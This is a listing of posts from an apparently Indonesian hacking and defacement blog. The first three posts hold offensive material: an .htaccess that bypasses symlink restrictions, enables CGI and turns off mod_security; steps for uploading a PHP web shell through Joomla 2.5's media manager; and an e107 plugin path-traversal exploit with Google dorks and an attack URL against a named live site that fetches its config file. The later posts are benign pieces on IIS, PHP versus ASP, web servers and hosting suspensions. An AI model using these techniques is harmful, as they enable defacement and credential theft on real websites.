htacces for bypass symlink

bypass 404 not found dan 403 forbiden di symlink
tidak berfungsi di litespeed web server
upload di dir config symlink yang forbiden
di dir yg kayak gini

Options FollowSymLinks MultiViews Indexes ExecCGI

AddType application/x-httpd-cgi .kamz

AddHandler cgi-script .pl
AddHandler cgi-script .pl

Addhandler ByPass Symlink
Options +FollowSymLinks
DirectoryIndex index.html
Options +Indexes
Options +ExecCGI
AddType text/plain .php
AddHandler server-parsed .php
Addhandler cgi-script .asp

<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>

save .htaccess

Read more »

Posted in: deface tools , deface trick

tutorial upload shell di joomla versi 2.5

tutorial upload shell di joomla 2.5
mungkin di antara kalian ada yg merasa kebingungan dengan cara upload shell di joomla versi 2.5 ini
mungkin tutor ini berguna :)) hehehhehe

1.go to media manager

2.setelah di media manager klik options dan tambahkan extensi ,php,
 

setelah itu klik save and close baru upload shell kakak

3.upload shell
dir shell akan berada di web/images/namashell.php

Read more »

Posted in: deface trick

e107 plugin local file Disclosure

##################################################
# Description : e107 Plugins - FilleDownload Plugin local file Disclosure
# Version : 1.1
# link : http://e107.org/e107_plugins/psilo/list.php?mode=plugin&cat=20&id=14
# Software : http://e107.org/e107_plugins/psilo/psilo.php?download.14
# Date : 18-06-2012
# Google Dork : inurl:/e107_plugins/filedownload

                inurl:/e107_plugins/image_gallery/


# Site : 1337day.com Inj3ct0r Exploit Database
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
##################################################

how to hack

pergi ke google tulis : inurl:/e107_plugins/image_gallery/

dapat salah 1 web vuln seperti ini : 

http://zers-leds.ru/e107_plugins/image_gallery/image_gallery.php

jika vuln kita akan dapat men download file config nya

so lets exploit

http://zers-leds.ru/e107_plugins/image_gallery/viewImage.php?name=../../../../e107_config.php&type=album

gotcha kita siap mendownload config dari web e107 ini dah selanjut nya use you logic 

post by gilang owners 666

Read more »

Posted in: deface trick

download Ebook Indo - Jaringan dan IPv6

Jaringan Komputer adalah salah satu bagian terpenting dalam Ilmu Komputer. Banyak tahapan yang bisa kita lakukan dalam mempelajari ilmu ini salah satunya dengan membaca ebook ini yang isinya lengkap dan langsung pada intinya.

Siilahkan ambil disini 

Read more »

Posted in: ebook

cara instal IIS server di windows 7

Sebelum anda menginstall IIS, Pastikan tidak ada web server yang terinstall, jika anda sudah install seperti XAMPP dan sejenisnya maka anda harus untuk mematikannya terlebih dahulu karena dihawatirkan terjadinya kres karena sesama web server.
setelah semuanya siap, sekarang kita siap untuk installasi IIS di windows 7 anda, Ikuti langkah2nya:

1. Klik kanan Computer

2. Cari Program and features, Setelah ketemu lalu pilih

3. Pilih Turn windows features on or off

4. Hingga muncul gambar dibawah ini, lalu cari Internet Information Service lalu pilih

5. Klik ganda pada Internet information service, lalu klik ganda pada World wide web service, dan klik ganda juga Aplication Development Features lalu pilih OK

6.  Tunggu hingga installasi selesai

7. Installasi selesai, sekarang kita buka browser kita http://localhost  jika berhasil maka akan muncul tampilan di browser anda seperti di gambar dibawah.

Untuk penyimpanan file-file ada di C:\inetpub\wwwroot, ini sudah otomatis begitu install maka secera default langsung menuju ke directory C. file-file website anda tinggal simp.an saja di sana.


sumber : kapten teknologi 

Read more »

Posted in: komputer programming , web enginerring

perbedaan antara php dan asp

ASP dan PHP merupakan bahasa pemrograman yang biasa digunakan untuk membuat website. Tidak seperti halaman web HTML biasa, ASP dan PHP lebih dinamis dan mampu membuat para user bisa berinteraksi dan bertukar informasi dengan database website

ASP merupakan kependekan dari Active Server Pages, suatu jenis program yang bekerja dalam Microsoft (Windows) melalui IIS (Internet Information Server). ASP memerlukan server Microsoft untuk menjalankan website. Sedangkan program PHP atau Hypertext Preprocessor berjalan di server Linux atau Unix. PHP yang lebih baru bisa berjalan di server NT.

Program PHP juga bisa berjalan di Windows, Solaris, Unix dan Linux sedangkan ASP hanya bisa berjalan di server dengan platform Windows. Baru-baru ini saja, ASP bisa berjalan pada platform Linux yang hanya ada bila sudah terinstall ASP-Apache di servernya.

Jika Anda seorang programmer mahir dengan bahasa C++, Anda mungkin akan lebih nyaman menggunakan PHP daripada ASP. PHP menggunakan C/C++ sebagai bahasa pemrograman dasar dan kebanyakan syntax-nya serupa antara yang satu dengan yang lain. Karena sebagian besar programmer masih menggunakan bahasa C++, PHP menjadi lebih populer dibanding dengan ASP.

ASP lebih banyak mirip dengan syntax dan interface-nya pemrograman Visual Basic. Hal itu dikarenakan pada dasarnya Visual Basic adalah berkorelasi dengan produk dan program-program buatan Microsoft. Jadi jika Anda seorang programmer, pemilihan antara ASP dan PHP sebenarnya didasarkan pada bahasa pemrograman mana yang paling Anda kuasai.

Jika dibandingkan dari segi biaya dan kemahalannya, program ASP membutuhkan Windows dengan IIS terinstall di servernya. Anda harus membeli kedua komponen tersebut agar ASP bisa berjalan. Sebaliknya, PHP hanya akan membutuhkan sebuah server Linux yang bisa Anda dapatkan secara cuma-cuma.

PHP sangatlah fleksibel ketika dikoneksikan dengan database. PHP bisa terkoneksi dengan beberapa database dimana yang sebagian besar digunakan adalah MySQL. Harap dicatat bahwa MySQL tidak akan membebani Anda sesen rupiah pun. Tapi bila Anda ingin memakai ASP, Anda perlu untuk membeli MS-SQL, produknya Microsoft.

Kecepatan me-load adalah faktor besar dalam memelihara website. Jika Anda sangat selektif soal kecepatan, Anda mungkin lebih membutuhkan PHP. Pada dasarnya kode PHP berjalan lebih cepat daripada ASP karena berjalan di space-nya sendiri sedangkan ASP menggunakan sebuah tambahan server dan menggunakan arsitektur berbasis COM.

Dalam bekerja dengan PHP, kebanyakan tools terasosiasi dengan program yang kebanyakan berupa open source software, jadi Anda tidak perlu membayar untuk mendapatkan tool tersebut. Tidak seperti ASP yang mungkin mengharuskan kita untuk membeli tool tambahan untuk bekerja dengan program ini.

Kesimpulannya: Baik PHP dan ASP mempunyai keuntungan dan kerugian. Pada dasarnya semua bergantung pada bagian pengembangan website mana yang akan Anda pilih. Apakah Anda mencemaskan biaya dari pembuatan website Anda? Apakah anda ingin menggunakan bahasa pemrograman yang familiar dengan Anda? Apakah Anda menginginkan website yang lebih stabil dan cepat? Pemilihan antara ASP dan PHP pada dasarnya tergantung pada preferensi Anda sendiri. Sebaiknya Anda berunding dengan programer atau webmaster lainnya dan cari sebanyak mungkin informasi mengenai kode pemrograman mana yang paling pas dengan website Anda.

He…. he… he… singkat banget kan.. tapi artikel ini menurut ane padat merayap.. jadi mudah untuk di cerna buat mereka yang hanya mencari seberkas pencerahan apa itu php? dan apa itu asp?

source : http://www.binushacker.net/perbedaan-php-dan-asp.html

Read more »

Posted in: web enginerring , web script

perbandingan antara ngix dan litespeed

kali ini gilang akan meberi tau kalian bereapa kelebihan dan kekurangan 2 web server raksasa yaitu ahahahah mungkin kurang berguna sih tapi dari pada blog ini sepi dan mungkin ada yg membutuh kan nya mari dibaca aja dulu

NginX

Homepage : www.nginx.netPlatforms : Linux, FreeBSD, Solaris, MacOS X

Kelebihan :

Opensource
Performa yang tinggi dan stabil serta memiliki banyak fitur
Konfigurasi yang cukup mudah
Menggunakan sedikit sumber daya
Cenderung lebih kuat u

ntuk hostingan banyak dibanding Litespeed

Kekurangan :
Bring up tο date yangcukup lama dibganding webserver lainnya
Qυісk CGI yang tidak berfungsi sempurna
Kadangkala ada masalah pada .htaccess namun hal ini tergantung dari konfigurasi webmasternya sendiri
Pemakai tidak sebanyak Apache / IIS

Yang menggunakan NginX antara lain adalah :
wordpress
kaskus
dagdigdug
yellowpages

Litespeed

Homepage : www.litespeedtech.com
Platforms : Linux, FreeBSD, Solaris, MacOS X

Kelebihan :
Bagus untuk Dynamic Site ( PHP, dll )
Kompatibel dengan Apache, Cpanel, Plesk, dan diret admin yang cukup bagus.
Adanya pencegahan sistem overloading
Konfigurasi dengan .htaccess yang cukup stabil bahkan sangat sempurna
dapat regenerate tanpa Down Time
kita dimudahkan migrasi dari webserver lain dengan mudah
Yang menggunakan Litespeed antara lain adalah :
Twitter
Gigaom
Bravenet

Mungkin itu adalah sekilas perbandingan Litespeed dan NginX. Semoga teman-teman dapat menentukan webserver mana yang cocok dan sesuai dengan keinginan anda semua. (dikutip dari : archivezt.com). Tetapi kalo untuk saya pribadi lebih suka menggunakan nginx yang menurut saya performanya sangat bagus, meskipun gratisan. Apalagi kalo dikonfigurasikan dengan memcached dan Varnish Reserve.

Read more »

Posted in: news , web enginerring

alasan dan mengapa web kita tersuspend oleh hosting

Dalam sebuah shared hosting itu bisa berasal dari sebuah VPS ( virtual private server) ataukah dari sebuah Dedicated. Bila kita sudah menyebutnya sebagai Shared Hosting, artinya bahwa dengan 1 server tersebut di pakai secara bersama-sama ,dengan jumlah yang bervariasi antara 500 -400 client dalam 1 server dedicated.

Dengan alasan itulah seorang client dari sebuah penyedia hosting harus mematuhi syarat dan ketentuan dari sebuah layanan hosting. Syarat dan ketentuan ini dalam istilah hosting kita biasa menyebutnya dengan Term of Services. Tanpa membaca Term of services (ToS) pun seharusnya kita menyadari bahwa bila kita membeli shared hosting, kita memakai bersama-sama dari space, traffic dan CPU usage. Untuk itulah segala sesuatu yang memberatkan kinerja server harus di hindari.

Apa sih alasan sebuah website kena suspend ?

1. Menggunakan Plugin SEO yang menguras server

Kadang kita ini tidak pernah melihat review dari sebuah plugin seo ini cocok untuk shared hosting atau tidak. Karena setiap plugin memiliki karakter yang berbeda.

Saya coba sebutkan contoh plugin dari sebuah CMS WordPress yang sangat menguras server adalah : Wp-Omatic, GDpress,  WProbot, dan sejenis autoblog.

Bila plugin itu di pasang akan menimbulkan lonjakan CPU usage hingga mencapai 50%, artinya dengan 1 website itu anda memakai 50% dari total server. Bila ini terjadi akses semua pengguna di dalamnya akan ikut terganggu menjadi lambat untuk di akses.

Apa yang tejadi bila beberapa domain menggunakan plugin yang sama dalam 1 server ?

Server Pasti Down

Semua user kena getahnya……………………..

Itulah sebabnya Hoster lebih memilih suspend 1 domain, dari pada 1000 domain kena dampaknya.

Intinya suspend account adalah untuk melindungi pengguna yang lain dalam menggunakan server hosting.

Apasih pertanyaan yang sering di ajukan oleh user bila account cpanel di suspend ?

1. Saya sudah tidak melanggar term of services hosting, kenapa di suspend?

2. Saya hanya memakai plugin standart kenapa di suspend ?

Sebab hoster melakukan suspend account bisa di sebabkan oleh hal-hal sbb :

1. Konflik Plugin yang satu dengan yang lain

2. Terlalu banyak plugin security yang rules plugin itu sendiri bertentengan

3. Jumlah visitor dalam 1 hari lebih dari 700 hits .

4. Script CMS anda memiliki sifat realtime calling ( sehingga melakukan koneksi cron ke web lain dalam waktu singkat)

5. Script CMS memiliki process PHP yg tidak resolve dengan cepat

6. Spam Comment / Hacking from comment

Bila spam comment ini di lakukan secara terus menerus, maka plugin security akan bekerja keras untuk menahan serangan spam comment ini, sehingga terjadi load server yang berlebihan.

7. Upaya hacking/ddos attack  terhadap website anda yang berdampak ke server pusat.

8. Spam Email/email massal : seringkali kita menggunakan share hosting sebagai media untuk melakukan email massal, tidak ada yg salah dengan ini. Namun pengiriman email biasanya di batasi oleh hoster misal 500 email per jam. Bila anda ingin mengirim lebih dari 500 email untuk member anda, gunakanlah script yang bisa melakukan proses throthling sehingga email akan dikirimkan bertahap. Karena tumpukan queue email akan menyebabkan load server meningkat.

9. Normal nya sebuah wordpress sejauh kami melakukan pengamatan maximal 10 plugin dalam 1 blog. Bila lebih dari itu maka proses calling blog tersebut memerlukan load server yg cukup lumayan.Bila blog anda memiliki misal 40 plugin artinya terlalu berlebihan 

10. Menggunakan cronjob dengan frekwensi yang terlalu sering misal per 2 detik

11. Menggunakan aplikasi yang di larang, misal : IRCD, bot, eggdrop, games, video dsb

Hoster sejauh kami mengamati, termasuk AtriumHosting tidak pernah semena-mena melakukan suspend account client. Namun kami berusaha untuk melakukan antisipasi dengan cara :

- mengirim email pemberitahuan bahwa penggunaan cpu terlalu berlebihan dan menyarankan untuk melakukan cek ulang website

Bila kondisi load server mengkawatirkan ( emergency ) makan tindakan mengirim email ini akan kami skip, dan akan dilakukan suspend terlebih dahulu, setelah itu baru diberitahukan ke klien .

Kenapa begitu ?

Karena bila kondisi load server mendekati 30% artinya kinerja server mulai melambat, bila hoster melakukan pengiriman email dahulu dan menunggu balasan serta perbaikan yang terlalu lama, maka waktu tidak akan mencukupi dan server sudah down duluan. Itulah sebabnya kenapa account anda di suspend tanpa pemberitahuan terlebih dahulu.

Solusinya ?

Bila account anda di suspend, artinya terjadi sesuatu di web anda, so anda tidak perlu marah2 ke hoster, karena dalam hal ini hoster bertindak benar atas dasar tidak ingin server down dan server stabil.

Hubungi hoster anda, bicarakan baik-baik dan carilah solusi bersama-sama, dengan begitu masalah akan terselesaikan dengan baik.

Read more »

Posted in: news , web enginerring